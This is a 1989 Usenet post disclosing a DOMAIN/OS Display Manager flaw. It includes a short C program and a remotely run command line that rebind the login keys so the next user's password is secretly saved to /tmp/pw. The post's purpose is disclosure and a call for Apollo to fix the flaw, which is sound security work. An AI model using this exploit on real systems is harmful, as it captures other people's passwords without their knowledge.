Path: utzoo!utgpu!watmath!att!pacbell!ames!mailrus!tut.cis.ohio-state.edu!cs.utexas.edu!uunet!mcvax!tuvie!tugiaik!plipp From: plipp@tugiaik.UUCP (Peter Lipp) Newsgroups: comp.sys.apollo Subject: security bug Keywords: apollo,domain_os,aegis,display manager Message-ID: <108@tugiaik.UUCP> Date: 8 Aug 89 09:21:53 GMT Organization: none Lines: 63 __________________________________________________________________ Possible Security Problem with DOMAIN-OS and the Display-Manager __________________________________________________________________ The following Program shall be called rdmc: /* rdmc.c - execute display manager command */ #include #include #include status_$t status; pad_$window_desc_t window={0,1000,20,20}; ios_$id_t stream; void init(); main (argc,argv) int argc; char *argv[]; { pad_$create_window((char *)0,0,pad_$transcript,1,window,&stream,&status); pad_$make_invisible(stream,1,&status); pad_$set_auto_close(stream,1,true,&status); pad_$dm_cmd(stream,argv[1],strlen(argv[1]),&status); } Now log into some machine X from some other machine Y via telnet, crp or similar and enter following command: rdmc "kd cr en;dr;kd cr xc -f '/tmp/pw' ;en;kd cr en ke ke ke" If currently no user was logged in at the display, the next time some user will log in his password will unnoticed and secretly be well-readable in file /tmp/pw - whow! Is'nt that great - what a system security! Has this problem been discussed on the net before? Has there been a proposed solution???? Apollo-Austria has not heard before of this problem. Please put pressure on Apollo to immediately solve it. This program has been written by one of our students - who was so kind to present it and not misuse it. But there might be others. If you post an answer or similar concerning this posting, please mail it to me too, because we are not on the news-net. Peter Lipp - Institute for Applied Information Processing University of Technology, Graz, Austria plipp@tugiig.uucp - plipp@tugiig.at - mcvax!tuvie!tugiig!plipp -- Peter Lipp - Institute for Applied Information Processing University of Technology, Graz, Austria plipp@tugiig.uucp - plipp@tugiig.at - mcvax!tuvie!tugiig!plipp